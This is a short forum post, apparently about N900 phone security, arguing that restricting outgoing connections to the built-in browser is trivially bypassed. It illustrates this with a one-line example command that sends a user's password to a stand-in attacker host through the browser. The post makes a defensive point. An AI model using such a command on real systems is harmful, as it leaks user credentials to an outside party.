View Single Post
Posts: 422 | Thanked: 244 times | Joined on Feb 2008
#3
Most things would be trivial to bypass. Lock down everything so only microb can make outgoing port 80 connections? To counter, bad person does this:

Code:
browser --url http://badperson.com/gatherpassword.php?pass=yourn900password
Only install apps from trusted sources - and you must define for yourself what is trusted, which may be nothing at all.